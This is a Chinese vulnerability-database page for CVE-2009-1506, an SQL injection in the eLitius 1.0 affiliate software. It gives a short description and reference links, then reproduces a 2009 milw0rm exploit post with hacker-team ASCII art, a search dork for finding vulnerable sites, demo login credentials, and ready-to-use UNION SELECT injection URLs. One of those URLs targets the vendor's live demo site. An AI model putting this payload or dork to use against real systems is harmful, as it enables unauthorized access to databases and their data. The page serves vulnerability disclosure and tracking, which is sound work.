Intelliants eLitius 'classes/Xp.phpp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117671 漏洞类型 SQL注入
发布时间 2009-04-29 更新时间 2009-05-02
CVE编号 CVE-2009-1506 CNNVD-ID CNNVD-200905-027
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8563
https://cxsecurity.com/issue/WLB-2009050097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-027
|漏洞详情
eLitius免是一款免费的连锁加盟管理软件。eitius1.0版本中的classes/Xp.php存在SQL注入漏洞。远程攻击者可以借助提交到banner-details.php的id参数,执行任意的SQL指令。
|漏洞EXP
==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                                   Script: elitius SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
                =                                                                                    =
                =                   script Demo:http://www.elitius.com/demo.html                     =
                =                                                                                    =
                =                               banner-details.php                                   =              
                 =================================== Snakespc ======================================    

Dork: Powered by eLitius Version 1.0

Note:
You must Sign in as member
username::demo>>>>>password::demo

Exploit:

http://localhost/clipshare/banner-details.php?id=-32'+UNION SELECT 1,2,3,concat(@@version,0x3a,user(),0x3a,database()),5,6,7,CHAR(83, 110, 97, 107, 101, 115, 84, 101, 97, 77)/* 

Demo :

http://www.elitius.com/demo/banner-details.php?id=-32'+UNION SELECT 1,2,3,concat(@@version,0x3a,user(),0x3a,database()),5,6,7,CHAR(83, 110, 97, 107, 101, 115, 84, 101, 97, 77)/*
                                                                      
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::
aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::Th3 g0bL!N::: Dr-HTmL

ALL www.Snakespc.com/sc >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2009-04-29]
|参考资料

来源:BID
名称:34769
链接:http://www.securityfocus.com/bid/34769
来源:MILW0RM
名称:8563
链接:http://www.milw0rm.com/exploits/8563